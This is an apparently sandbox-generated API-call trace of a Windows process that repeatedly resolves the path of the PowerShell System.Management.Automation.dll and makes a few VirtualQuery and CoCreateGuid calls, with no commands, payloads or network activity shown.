	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.250] VirtualQuery (in: lpAddress=0x20b420, lpBuffer=0x20c2e0, dwLength=0x30 | out: lpBuffer=0x20c2e0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.251] VirtualQuery (in: lpAddress=0x20b4b0, lpBuffer=0x20c370, dwLength=0x30 | out: lpBuffer=0x20c370*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.251] VirtualQuery (in: lpAddress=0x20b6d0, lpBuffer=0x20c590, dwLength=0x30 | out: lpBuffer=0x20c590*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xf12c7663, Data2=0x6374, Data3=0x4296, Data4=([0]=0x81, [1]=0xfc, [2]=0x69, [3]=0x7e, [4]=0x3c, [5]=0x20, [6]=0x99, [7]=0x63))) returned 0x0
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xce12e0d0, Data2=0x1b49, Data3=0x492c, Data4=([0]=0x99, [1]=0x97, [2]=0x19, [3]=0xf5, [4]=0x59, [5]=0xe5, [6]=0xc5, [7]=0x39))) returned 0x0
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x182c558f, Data2=0x3cb2, Data3=0x4400, Data4=([0]=0xbe, [1]=0x8, [2]=0x56, [3]=0xf6, [4]=0xcc, [5]=0x87, [6]=0x2e, [7]=0x3c))) returned 0x0
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.254] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0xea6fae0e, Data2=0xac68, Data3=0x45ab, Data4=([0]=0xa9, [1]=0x2f, [2]=0x8d, [3]=0x68, [4]=0x76, [5]=0x4c, [6]=0xb0, [7]=0xa0))) returned 0x0
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.255] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x8fe1c998, Data2=0x4ce3, Data3=0x4fbb, Data4=([0]=0x90, [1]=0x9, [2]=0x34, [3]=0x8f, [4]=0x78, [5]=0x8d, [6]=0xfb, [7]=0x3b))) returned 0x0
	[0412.255] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x50f864be, Data2=0x1637, Data3=0x4845, Data4=([0]=0x8d, [1]=0xfa, [2]=0x50, [3]=0x44, [4]=0x8e, [5]=0x19, [6]=0x7b, [7]=0x6c))) returned 0x0
	[0412.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x1d9b94e9, Data2=0x7e5c, Data3=0x42fd, Data4=([0]=0x87, [1]=0xd3, [2]=0x7b, [3]=0xd3, [4]=0x8c, [5]=0x38, [6]=0x8c, [7]=0xda))) returned 0x0
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.256] CoCreateGuid (in: pguid=0x20d410 | out: pguid=0x20d410*(Data1=0x20ad1181, Data2=0xdae8, Data3=0x4d10, Data4=([0]=0xa0, [1]=0xd7, [2]=0xff, [3]=0x4f, [4]=0xb3, [5]=0x5b, [6]=0xcc, [7]=0xa4))) returned 0x0
	[0412.257] VirtualQuery (in: lpAddress=0x20b290, lpBuffer=0x20c150, dwLength=0x30 | out: lpBuffer=0x20c150*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
